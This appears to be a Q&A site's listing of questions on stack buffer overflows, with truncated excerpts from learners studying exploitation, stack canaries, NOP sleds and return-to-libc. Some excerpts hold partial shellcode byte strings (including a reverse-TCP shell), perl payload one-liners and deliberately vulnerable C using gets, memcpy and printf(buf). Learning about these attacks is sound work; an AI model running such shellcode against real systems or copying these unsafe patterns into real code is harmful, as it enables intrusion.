All Questions
Tagged with buffer-overflow stack-overflow
59 questions
0
votes
2answers
43 views
What is the difference between stack buffer overflow, stack underflow and stack overflow?
My teacher from data structures mentioned it during our lectures today when studying stack, but didn't give proper explanation to it.
2
votes
1answer
118 views
The Shellcode to open Calc.exe too long and complex, can't understand! My first exploit program
I wrote my first exploit program on Windows XP OS using the shellcode i foung on the web. It opens the calculator and the overall program works successfully. However, even though i did not write the ...
0
votes
0answers
51 views
ELF-64 corrupted interpreter, what are the possible causes? (seems like an overflow issue)
I have an ELF-64 executable that says "No such file or directory" when executed.
Then I proceeded to using the command file <filename> to see what's wrong and indeed the interpreter looks like ...
1
vote
0answers
16 views
Is it possible to crash entire computer from a buffer overflow by overwriting entire stack?
Is it possible to crash the computer by an extremely long buffer overflow?
This is more to understand the mechanics of the overflow than the actual consequences. Lets say I run a program without any ...
0
votes
0answers
30 views
Stack buffer overflow and output the character
static const int answer = 0x21072107;
int main(int argc, char **argv)
{
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
int x = 0;
char buffer[32];
printf(...
0
votes
1answer
49 views
Stack Alignment - Buffer Overflow Testing
I've done a lot of research trying to understand this topic but still have some confusion. Currently I'm investigating buffer overflow. Here's an example of the function I'm looking at:
int ...
-1
votes
1answer
82 views
how do overflow the buffer with a specific return address?
Here is an array that I was given:
char overflow[16]="\xEF\xBE\xAD\xDE\xEF\xBE\xAD\xDE"
"\xEF\xBE\xAD\xDE\xEF\xBE\xAD\xDE";
and here is the address: "0x1234B000"
how do I edit ...
0
votes
0answers
140 views
Buffer Overflow Exploit : sh: 1: Syntax error: Unterminated quoted string : Developing exploit for personal enrichment
So recently, I've been reading the book Hacking: The Art of Exploitation by Jon Erickson in order to work on my software security skills. This book is starting to get a little bit outdated though, and ...
1
vote
0answers
63 views
Buffer Overflow with Python - Send multiple strings to C's scanf() function
I currently try to do a Buffer Overflow attack to a simple C Program.
This Program takes 2 inputs via C's scanf function. The First input is secure, the second is not. So I found my shellcode, the ...
1
vote
1answer
215 views
Linux: Buffer overflow of simple C program is giving SIGBUS
I am a beginner in binary exploitation, and I'm training for the exploitation of buffer overflows. I made a useless short C program:
#include <stdio.h>
#include <stdlib.h>
int main(void) ...
0
votes
0answers
394 views
Bufferoverflow works in GDB but not without it. (Extended Version)
My question is pretty much what the title describes, I have read a lot of articles online but none of them explained how can I actually make a workable exploit like ./buf < attack.txt where attack....
0
votes
1answer
544 views
Stack canaries can be disabled by compiler?
Who is responsible for inserting the stack canaries in the stack? Is it the OS?
If yes, how can the gcc compiler disable them by using the -fno-stack-protector option? Or it is only a flag created ...
4
votes
1answer
167 views
How do i bypass a return adress overwrite not redirecting control flow?
Let me illustrate the problem here
This is main
(gdb) disass main
Dump of assembler code for function main:
0x000000000040057c <+0>: push rbp
0x000000000040057d <+1>: mov rbp,...
1
vote
1answer
51 views
How is temp data stored on the stack frame
Int test(){
char buff[10]
printf("Enter text: ");
gets(buff);
puts(buff);
}
I don't know how to phrase this question but I'm trying to understand how values are stored on on the ...
1
vote
0answers
404 views
Stack based VS heap based buffer overflow
Why is heap-based buffer overflow difficult than stack-based? Also, what is the difference between them?
I know that memory is allocated dynamically in case of heaps but, is that it?
-3
votes
1answer
267 views
C Stack Buffer Overflow
I am trying to replicate a stack buffer overflow. This is my code
#include <stdio.h>
int main(int argc, char *argv[]) {
char x[1];
gets(x);
printf("%s\n", x);
}
I am compiling this on a ...
-1
votes
1answer
106 views
Is there any other ways to make the program print hostname to stdout or just shellcode?
It is a lab assignment asking us to exploit this program. The first task is to call the notcalled function(which is solved by change the return address to the notcalled function :perl -e 'printf "A"...
2
votes
1answer
857 views
Illegal Instruction when trying to get shell from a simple stackoverflow
I'm trying to exploit the stack overflow vulnerability to get a shell. When i tried to run it, It shows illegal hardware instruction after executing the shellcode instead of giving a shell(error ...
1
vote
0answers
506 views
Why reverse_tcp Shellcode doesn't work?
I am using this shellcode:
\x6a\x66\x58\x6a\x01\x5b\x31\xd2\x52\x53\x6a\x02\x89\xe1\xcd\x80\x92\xb0\x66\x68\xc0\xa8\x0f\x81\x66\x68\x05\x39\x43\x66\x53\x89\xe1\x6a\x10\x51\x52\x89\xe1\x43\xcd\x80\...
0
votes
1answer
244 views
$esp register not found
I am learning debugging with gdb and registers, but I am stuck in one point. As an instruction, I should print
print $esp
result: $1 = -9008
but I was expecting such result:
$2 = (void *) ...
3
votes
2answers
3k views
Disabling stack protection in GCC not working
I'm trying to recreate a stack buffer overflow using the classic overflow with strcpy using this function:
#include <stdio.h>
#include <string.h>
void main(int argc, char **argv) {
...
5
votes
3answers
3k views
Why is my stack buffer overflow exploit not working?
So I have a really simple stackoverflow:
#include <stdio.h>
int main(int argc, char *argv[]) {
char buf[256];
memcpy(buf, argv[1],strlen(argv[1]));
printf(buf);
}
I'm trying to ...
1
vote
0answers
299 views
\x00 treated as null byte and doesnt count
I'm trying to learn about stack overflow, when I want to overwrite the eip register i type in my shell this command:
run $(perl -e 'print "\xb8\x06\x40\x00" x 20;')
it supposed to overwrite the ...
0
votes
0answers
105 views
ESP after SEH Exception with same program on different computers
Below are a few articles that exploit different programs by using ESP after the SEH exception to POPAD back to a controllable part of the stack. The other article demonstrates stack pivoting finding ...
2
votes
1answer
118 views
First experiments with buffer overflow
I've started reading about buffer overflow and how hackers use it to execute custom code instead of the regular compiled one and now I'm trying to reproduce some basic situations, with a vurnerable ...
-4
votes
2answers
68 views
Undefined computer behavior after running a C program
I am getting right to the point because I cannot explain the situation that I am going to describe. I need your attention please!
Yesterday I wrote a program in C. The program takes as input a string ...
1
vote
1answer
228 views
How to prevent stack overflow when dealing with long recursive productions in C?
Given a grammar, how can one avoid stack overflow problem when calculating FIRST and FOLLOW sets in C. The problem arose in my code when I had to recurse through a long production.
Example:
S->...
4
votes
1answer
2k views
Stack-based buffer overflow - challenge in C using scanf with limited input
As part of a security CS course, my class has been given the task of exploiting a vulnerability to beat a password check using a stack/buffer overflow. The code with the vulnerability is as follows:
#...
1
vote
1answer
1k views
Can you explain the method of finding the offset of a buffer when looking for buffer overflow potential
I'm looking at aleph's article on phrack magazine. The code below can also be found there.
We have a vulnerable executable which it's code is:
vulnerable.c
void main(int argc, char *argv[]) {
...
1
vote
2answers
1k views
Exploit Development - Shellcode Doesn't Work?
I am following corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/ to reproduce the exploit.
Firstly, I found the position of EIP was after the 26089 As (at ...
1
vote
1answer
350 views
segmentation error while injecting shellcode to stack smash
I have been trying to understand how stack overflow attacks work. So far I can successfully redirect the return address to an instruction inside the original code. I have written a shellcode launcher ...
-2
votes
2answers
286 views
How to do Infinite Loop
My aim is to write an infinite loop. I have to print infinitely this string "Hello World %s" and I can just use ROP (Return-oriented programming).
gcc -fno-stack-protector loop.c -o loop
I can ...
0
votes
1answer
2k views
Nop Sled, can you explain it to me?
I have been reading this book: Hacking, the art of exploitation
On page 140, the book explains the Nop Slide:
We’ll create a large array (or sled) of these NOP instructions and place it
before ...
0
votes
0answers
300 views
Why variable 'pass' change it's value after stack buffer overflow?
I can't understand what's happening with buf1 and pass in main(). I understand that after buffer overflow in gets(buf1):
Firstly (by input more then 15 characters), we are actually
changing calling ...
0
votes
1answer
242 views
change the return address to point to shellcode
Im using linux and I have c program, I would like to change the return address to point to my shellcode, im unable to do it.
Here is my shellcode
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\...
0
votes
1answer
209 views
why putenv(buf) doesn't work properly because memcpy(buf + 92, “\x00\x14\xe4\xf7” , 4) copies a \x00 byte to buf?
am using ubuntu 14.04. So am having latest kernel.
am trying to do Return to libc method.
here is my code to create a environment variable, which will be later input to the victim code
#include<...
16
votes
3answers
1k views
Should the memory vulnerability of the line of code “printf(”%s“, argv[1]);” be described as a stack overflow?
Today, I took a short "C++ skills test" from Elance.com. One question was the following:
What is the security vulnerability of the following line of code:
printf("%s", argv[1]);
Option 1:...
3
votes
1answer
807 views
How to set a gdb watchpoint to a value stored in register?
I'm trying to detect stack overflow in some function, and want to set a watchpoint to a memory pointed by the RSP register. I can't just set a watchpoint to a certain address as the function could be ...
-1
votes
1answer
156 views
need to detect any possible buffer overflows
hi guys i need some help with this code. i want to know if there is any buffer overflow in this code. basically this is an exercise for my university. we need to exploit it to open a shell. until now ...
10
votes
2answers
36k views
Malloc segmentation fault
Here is the piece of code in which segmentation fault occurs (the perror is not being called):
job = malloc(sizeof(task_t));
if(job == NULL)
perror("malloc");
To be more precise, gdb says that ...
2
votes
2answers
371 views
Overflowing a stack in theory.. and assembly
Assuming an x86 system with no aslr I'd like to ask the following;
1) Theory says that when we execute a stack overflow attack, the value pointed to by the ebp register is overwritten with the new ...
1
vote
1answer
113 views
Does each process has its own portion of utopia in the memory?
By doing some cat /proc/*some PID*/maps on multiple processes on a machine, I notice they all have the same starting point in regards to memory address, being 0x8048000. Does this mean that every ...
9
votes
3answers
718 views
Smashing the stack example3.c confusion
Article can be found here.
I'm reading up on smashing the stack and have found myself to be getting stuck on example3.c.
0x80004a3 <main+19>: call 0x8000470 <function>
0x80004a8 <...
7
votes
2answers
3k views
What is the difference between STATUS_STACK_BUFFER_OVERRUN and STATUS_STACK_OVERFLOW?
I just found out that there is a STATUS_STACK_BUFFER_OVERRUN and a STATUS_STACK_OVERFLOW. What's the difference between those 2? I just found Stack overflow (stack exhaustion) not the same as stack ...
0
votes
1answer
133 views
Are the old days of code injection over? [closed]
I was wondering since all updated operating systems guard against stack and heap type overflows via ASLR, Canary Checks, and other such methods, are memory corruption exploits still prevalent? Given ...
0
votes
1answer
1k views
Rewriting EBP stack return value
Hi I'm trying to write an overflow exploit for a simple program that I've built. Bellow is the C program that I've written.
#include <unistd.h>
#include <string.h>
#include <stdio.h>...
2
votes
5answers
4k views
Execution of function pointer to Shellcode
I'm trying to execute this simple opcode for exit(0) call by overwriting the return address of main.
The problem is I'm getting segmentation fault.
#include <stdio.h>
char shellcode[]= "/0xbb/...
0
votes
2answers
383 views
Is buffer-overflow considered a “solved problem” ? (at least for future systems)
I am looking at various buffer/heap/stack protection technologies such as PAX, DEP, NX, CANARIES, etc
And a new one SMEP - http://vulnfactory.org/blog/2011/06/05/smep-what-is-it-and-how-to-beat-it-on-...
8
votes
1answer
4k views
return to libc - problem
I'm having problems with return-to-libc exploit. The problem is that nothing happens, but no segmentation fault (and yes I'm actually overflowing the stack).
This is my program:
int main(int argc, ...
1
vote
3answers
429 views
Buffer Overflow-Not getting the Correct output
the Shell code print the hostname(bin/hostname). but when i execute the code its shows me the the path in reverse order but not printing the HOSTNAME.
I am actually doing the buffer over flow .
I ...
